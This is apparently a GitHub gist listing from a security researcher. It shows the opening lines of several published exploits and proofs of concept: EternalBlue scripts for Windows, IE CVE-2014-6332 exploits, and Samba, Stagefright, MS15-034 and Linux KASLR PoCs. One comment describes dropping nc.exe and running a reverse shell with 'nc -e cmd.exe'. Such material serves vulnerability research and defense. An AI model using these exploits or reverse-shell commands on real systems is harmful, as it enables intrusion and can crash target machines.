Worawit Wangwarunyoo worawit

@worawit
worawit / eternalblue_merge_shellcode.py
Last active April 3, 2024 12:25
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
worawit / cve-2014-6332_win7_ie11_poc.html
Last active March 30, 2024 15:03
CVE-2014-6332 PoC to get shell or bypass protected mode
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
worawit / cve-2015-0240_samba_poc
Last active March 30, 2024 15:03
PoC for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
PoC for Samba vulnerability (CVE-2015-0240) by sleepya
This PoC only triggers the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
worawit / cve-2014-6332_exploit.html
Last active March 30, 2024 15:02
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe, then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)
worawit / eternalblue8_exploit.py
Last active March 16, 2024 18:38
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
worawit / SafeArrayRedim.cpp
Last active January 18, 2024 08:23
CVE-2014-6332
/*
* reversed SafeArrayRedim() in oldaut32.dll (Windows XP)
* for CVE-2014-6332
*/
typedef struct tagSAFEARRAY
{
USHORT cDims; // number of dimensions
USHORT fFeatures; // type of elements
ULONG cbElements; // byte size per element
worawit / eternalblue7_exploit.py
Last active June 20, 2023 08:21
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
#!/usr/bin/python
"""
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c
"""
from struct import pack
def create_box(atom_type, data):
    return pack("!I", len(data)+4+4) + atom_type + data
worawit / http_sys_pseudo.c
Last active July 30, 2021 04:18
MS15-034 (CVE-2015-1635) PoCs
/*
Pseudo code in HTTP.sys to understand flow related to MS15-034
All pseudo code is reversed from the vulnerable HTTP.sys on Windows 7 SP1 x86
For anyone who wants to know which functions are patched:
Just open patched version and find all functions reference to RtlULongLongAdd().
*/
/*
This PoC is based on http://www.immunityinc.com/downloads/x86leaks_old.pdf
The PoC finds direct physical map and kernel text address in Linux kernel without PTI on Intel x64.
The PoC might not work correctly in VM. For example, this PoC cannot find correct direct physical map
address in KVM. The reason is in https://www.kernel.org/doc/Documentation/virtual/kvm/mmu.txt
$ ./break_linux_kaslr_nopti